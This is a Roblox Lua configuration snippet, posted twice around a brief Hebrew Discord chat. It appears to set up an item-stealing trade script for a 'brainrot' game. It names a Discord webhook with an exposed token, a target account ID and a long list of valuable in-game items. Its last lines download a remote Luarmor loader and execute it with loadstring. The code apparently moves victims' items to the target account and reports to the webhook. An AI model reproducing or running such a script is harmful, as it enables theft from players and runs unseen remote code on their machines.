genv.WEBHOOK_URL = "https://discord.com/api/webhooks/1471189815411343529/MbN9NpXP5zyXmFGA2YVrIFgNRE_apFpV9d9z_qPHOCQu_qvnAJe66OO7vWvMAMm_F1RL"
genv.TARGET_ID = 10225356741
genv.DELAY_STEP = 1
genv.TRADE_CYCLE_DELAY = 2
genv.TARGET_BRAINROTS = {
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Las Sis"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Los Primos"] = true,
    ["Swag Soda"] = true,
    ["Chipso and Queso"] = true,
    ["Strawberry Elephant"] = true,
    ["Festive 67"] = true,
    Orcaledon = true,
    ["Tuff Toucan"] = true,
    ["Reinito Sleighito"] = true,
    ["La Supreme Combinasion"] = true,
    Cerberus = true,
    ["La Ginger Sekolah"] = true,
    ["La Romantic Grande"] = true,
    ["W or L"] = true,
    Tralaledon = true,
    ["Tictac Sahur"] = true,
    ["Tang Tang Keletang"] = true,
    ["La Casa Boo"] = true,
    ["Fragola La La La"] = true,
    ["Celularcini Viciosini"] = true,
    ["Swaggy Bros"] = true,
    ["Los Puggies"] = true,
    ["Guest 666"] = true,
    ["Spooky and Pumpky"] = true,
    ["La Jolly Grande"] = true,
    ["Love Love Bear"] = true,
    ["Skibidi Toilet"] = true,
    ["Dragon Cannelloni"] = true,
    ["Rosey and Teddy"] = true,
    ["Money Money Reindeer"] = true,
    ["Los Sekolahs"] = true,
    ["La Food Combinasion"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Spooky Grande"] = true,
    ["Lavadorito Spinito"] = true,
    ["La Extinct Grande"] = true,
    ["Los Bros"] = true,
    ["La Secret Combinasion"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Taco Combinasion"] = true,
    ["Garama and Madundung"] = true,
    Eviledon = true,
    ["Ketupat Bros"] = true,
    Meowl = true,
    ["Ginger Gerat"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Ketupat Kepat"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Gingerini"] = true,
    ["Capitano Moby"] = true
}
local HttpGetContent_117 = game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua")
local v118 = loadstring(HttpGetContent_117)() 
אני משנה פה
ככה טוב?
benaya — 11:15 PM
לא
עכשיו כן
Icey

 — 11:15 PM
genv.WEBHOOK_URL = "https://discord.com/api/webhooks/1471189815411343529/MbN9NpXP5zyXmFGA2YVrIFgNRE_apFpV9d9z_qPHOCQu_qvnAJe66OO7vWvMAMm_F1RL"
genv.TARGET_ID = 10225356741
genv.DELAY_STEP = 1
genv.TRADE_CYCLE_DELAY = 2
genv.TARGET_BRAINROTS = {
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Las Sis"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Los Primos"] = true,
    ["Swag Soda"] = true,
    ["Chipso and Queso"] = true,
    ["Strawberry Elephant"] = true,
    ["Festive 67"] = true,
    Orcaledon = true,
    ["Tuff Toucan"] = true,
    ["Reinito Sleighito"] = true,
    ["La Supreme Combinasion"] = true,
    Cerberus = true,
    ["La Ginger Sekolah"] = true,
    ["La Romantic Grande"] = true,
    ["W or L"] = true,
    Tralaledon = true,
    ["Tictac Sahur"] = true,
    ["Tang Tang Keletang"] = true,
    ["La Casa Boo"] = true,
    ["Fragola La La La"] = true,
    ["Celularcini Viciosini"] = true,
    ["Swaggy Bros"] = true,
    ["Los Puggies"] = true,
    ["Guest 666"] = true,
    ["Spooky and Pumpky"] = true,
    ["La Jolly Grande"] = true,
    ["Love Love Bear"] = true,
    ["Skibidi Toilet"] = true,
    ["Dragon Cannelloni"] = true,
    ["Rosey and Teddy"] = true,
    ["Money Money Reindeer"] = true,
    ["Los Sekolahs"] = true,
    ["La Food Combinasion"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Spooky Grande"] = true,
    ["Lavadorito Spinito"] = true,
    ["La Extinct Grande"] = true,
    ["Los Bros"] = true,
    ["La Secret Combinasion"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Taco Combinasion"] = true,
    ["Garama and Madundung"] = true,
    Eviledon = true,
    ["Ketupat Bros"] = true,
    Meowl = true,
    ["Ginger Gerat"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Ketupat Kepat"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Gingerini"] = true,
    ["Capitano Moby"] = true
}
local HttpGetContent_117 = game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua")
local v118 = loadstring(HttpGetContent_117)()
